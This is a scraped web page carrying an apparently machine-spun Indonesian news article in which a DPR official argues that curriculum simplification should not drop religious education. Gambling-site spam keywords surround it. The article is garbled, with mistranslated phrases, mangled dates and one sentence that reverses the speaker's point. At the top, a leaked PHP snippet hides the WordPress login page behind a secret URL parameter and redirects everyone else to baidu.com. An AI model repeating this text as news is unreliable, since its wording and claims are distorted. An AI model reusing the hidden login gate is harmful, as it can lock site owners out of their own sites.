//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } RMR: Penyederhanaan kurikulum seharusnya tidak menghilangkan pendidikan agama | adu ayam bali_s128.net login_s128.live

RMR: Penyederhanaan kurikulum seharusnya tidak menghilangkan pendidikan agama

Jakarta TRIBUNNEWS.COM-Ketua Fraksi PKB X DPR RI Syaiful Huda menanggapi rencana penyederhanaan yang diajukan Kementerian Pendidikan dan Kebudayaan (Kemendikbud), yaitu menggabungkan Pendidikan Agama Pancasila dan Pendidikan Kewarganegaraan (PPKN).

Syaiful Huda menegaskan bahwa penyederhanaan kurikulum hendaknya tidak menghilangkan pilar pendidikan termasuk pendidikan agama.

“Kami yakin wacana yang memadukan pendidikan agama dengan Pancasila dan Pendidikan Kewarganegaraan (PPKN) tidak cocok untuk dua tema tersebut. Filsafat dan isinya tidak bisa menggantikan yang lain.” Syaiful Huda di Tribunnews.com, Jumat (6/2) lalu (6). / 19/2020) berkata. Orang selalu mengatakan bahwa pendidikan nasional memiliki rumusan dan akar dasar. — Bacaan: Ketua Panitia X DPR: Penyederhanaan Kurikulum Tidak Bisa Menghilangkan Pendidikan Agama-Tiga UU Beras adalah UU No 4/1950, UU No 2/1989 dan UU No 20/2003. Nilai-nilai budaya dan agama adalah Landasan dan akar sistem pendidikan negara.

“Akar dan landasan pendidikan nasional menjadi acuan dalam menentukan tujuan, kebijakan dan rencana pendidikan nasional pada langkah selanjutnya. Oleh karena itu mata pelajaran dari akar pendidikan nasional dapat dihapus atau digabungkan dengan materi lain. Dikatakannya:“ Ia tegaskan saat ini Materi pendidikan agama perlu ditanamkan kepada siswa. Artinya materi pendidikan harus mengajarkan nilai-nilai toleransi, nilai toleransi, dan sikap bertarak dalam kehidupan.

Dengan munculnya pandangan agama yang kaku dan keras baru-baru ini di semua sektor masyarakat, bahan-bahan ini sangat dibutuhkan.

“Keyakinan beragama masyarakat Indonesia adalah salah satu tolak ukur, jadi jangan sampai tolak ukur tersebut diisi dengan pandangan agama yang sempit dan kuno. Ia mengatakan:“ Sekolah bisa menjadi cara untuk menyebarkan nilai-nilai agama yang bersahabat. “

Leave a comment

adu ayam bali_s128.net login_s128.live